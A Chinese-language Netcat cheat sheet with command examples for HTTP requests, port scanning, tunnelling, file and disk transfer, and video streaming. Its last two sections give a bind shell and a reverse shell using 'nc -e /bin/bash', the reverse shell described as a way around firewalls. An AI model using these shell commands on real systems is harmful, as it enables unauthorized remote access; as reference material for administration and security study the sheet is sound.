Netcat 备忘清单

$ nc website.com 80
GET index.html HTTP/1.1
HEAD / HTTP/1.1

或者

echo "" | nc -zv -wl 192.168.1.1 801-805

扫描 21 到 25 之间的端口

$ nc -zvn 192.168.1.1 21-25

扫描端口 22、3306 和 8080

$ nc -zvn 192.168.1.1 22 3306 8080

$ nc -lp 8001 -c "nc 127.0.0.1 8000"

或者

$ nc -l 8001 | nc 127.0.0.1 8000

创建从一个本地端口到另一个本地端口的隧道

服务器 Server (192.168.1.9)

$ nc -lv 8000 < file.txt

客户端 Client

$ nc -nv 192.168.1.9 8000 > file.txt

假设您想将文件 file.txt 从服务器 A 传输到客户端 B。

服务器 Server (192.168.1.9)

$ nc -lv 8000 > file.txt

客户端 Client

$ nc 192.168.1.9 8000 < file.txt

假设您想将文件 file.txt 从客户端 B 传输到服务器 A

服务器 Server (192.168.1.9)

$ tar -cvf – dir_name | nc -l 8000

客户端 Client

$ nc -n 192.168.1.9 8000 | tar -xvf -

假设您想通过网络将目录从 A 传输到 B

服务器 Server (192.168.1.9)

$ dd if=/dev/sda | nc -l 8000

客户端 Client

$ nc -n 192.168.1.9 8000 | dd of=/dev/sda

克隆 linux PC 非常简单。假设你的系统盘是 /dev/sda

服务器 Server (192.168.1.9)

$ cat video.avi | nc -l 8000

客户端 Client

$ nc 192.168.1.9 8000 | mplayer -vo x11 -cache 3000 -

使用 netcat 流式传输视频

服务器 Server (192.168.1.9)

$ nc -lv 8000 -e /bin/bash

客户端 Client

$ nc 192.168.1.9 8000

我们已经使用 telnet 和 ssh 使用远程 Shell，但是如果它们没有安装并且我们没有安装它们的权限，那么我们也可以使用 netcat 创建远程 shell

服务器 Server (192.168.1.9)

$ nc -lv 8000

客户端 Client

$ nc 192.168.1.9 8000 -v -e /bin/bash

反向 shell 通常用于绕过防火墙限制，例如阻止入站连接